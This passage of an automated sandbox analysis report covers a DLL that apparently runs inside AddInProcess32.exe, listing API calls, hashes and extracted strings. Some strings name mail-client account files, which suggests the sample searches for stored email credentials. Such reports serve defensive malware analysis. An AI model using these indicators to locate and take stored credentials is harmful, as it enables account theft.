                                                      • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 491 10008862-10008886 MultiByteToWideChar 489->491 492 10008857-1000885f 489->492 490->489 500 1000884e 490->500 494 10008a19-10008a2c call 10002ada 491->494 495 1000888c-10008898 491->495 492->491 497 1000889a-100088ab 495->497 498 100088ec 495->498 501 100088ca-100088db call 100056d0 497->501 502 100088ad-100088bc call 1000bf20 497->502 504 100088ee-100088f0 498->504 500->489 506 10008a0e 501->506 516 100088e1 501->516 502->506 515 100088c2-100088c8 502->515 505 100088f6-10008909 MultiByteToWideChar 504->505 504->506 505->506 509 1000890f-1000892a call 10005f19 505->509 510 10008a10-10008a17 call 10008801 506->510 509->506 520 10008930-10008937 509->520 510->494 519 100088e7-100088ea 515->519 516->519 519->504 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 524 100089c9 521->524 525 1000897f-10008990 521->525 522->510 523 10008944-10008946 522->523 523->506 526 1000894c-10008966 call 10005f19 523->526 527 100089cb-100089cd 524->527 528 10008992-100089a1 call 1000bf20 525->528 529 100089ab-100089bc call 100056d0 525->529 526->510 543 1000896c 526->543 532 10008a07-10008a0d call 10008801 527->532 533 100089cf-100089e8 call 10005f19 527->533 528->532 541 100089a3-100089a9 528->541 529->532 542 100089be 529->542 532->506 533->532 546 100089ea-100089f1 533->546 545 100089c4-100089c7 541->545 542->545 543->506 545->527 547 100089f3-100089f4 546->547 548 10008a2d-10008a33 546->548 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->532 550 10008a35-10008a3c call 10008801 549->550 550->510
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                      • __freea.LIBCMT ref: 10008A08
                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                      • __freea.LIBCMT ref: 10008A11
                                                      • __freea.LIBCMT ref: 10008A36
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                      APIs
                                                      • _strlen.LIBCMT ref: 10001607
                                                      • _strcat.LIBCMT ref: 1000161D
                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                      • String ID:
                                                      • API String ID: 1922816806-0
                                                      • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                      • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                      • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                      • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                      APIs
                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                      • String ID:
                                                      • API String ID: 3594823470-0
                                                      • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                      • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                      • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                      • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                      • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                      • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                      • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                      • _free.LIBCMT ref: 10005B2D
                                                      • _free.LIBCMT ref: 10005B55
                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                      • _abort.LIBCMT ref: 10005B74
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                      • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                      • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                      • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                      APIs
                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                      • API String ID: 4036392271-1520055953
                                                      • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                      • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                      • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                      • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                      • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                      • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                      • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                      • _free.LIBCMT ref: 100071B8
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                      • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                      • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                      • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                      • _free.LIBCMT ref: 10005BB4
                                                      • _free.LIBCMT ref: 10005BDB
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                      • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                      • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                      • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                      • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                      • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                      • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 493641738-0
                                                      • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                      • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                      • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                      • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                      APIs
                                                      • _free.LIBCMT ref: 100091D0
                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                      • _free.LIBCMT ref: 100091E2
                                                      • _free.LIBCMT ref: 100091F4
                                                      • _free.LIBCMT ref: 10009206
                                                      • _free.LIBCMT ref: 10009218
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                      • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                      • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                      • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                      APIs
                                                      • _free.LIBCMT ref: 1000536F
                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                      • _free.LIBCMT ref: 10005381
                                                      • _free.LIBCMT ref: 10005394
                                                      • _free.LIBCMT ref: 100053A5
                                                      • _free.LIBCMT ref: 100053B6
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                      • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                      • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                      • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 10004C1D
                                                      • _free.LIBCMT ref: 10004CE8
                                                      • _free.LIBCMT ref: 10004CF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                      • API String ID: 2506810119-760905667
                                                      • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                      • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                      • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                      • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                      • __freea.LIBCMT ref: 100087D5
                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                      APIs
                                                      • _free.LIBCMT ref: 1000655C
                                                        • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                        • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                        • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                      • String ID: *?$.
                                                      • API String ID: 2667617558-3972193922
                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                      • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                      • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID: : $Se.
                                                      • API String ID: 4218353326-4089948878
                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                      Strings
                                                      Memory Dump Source
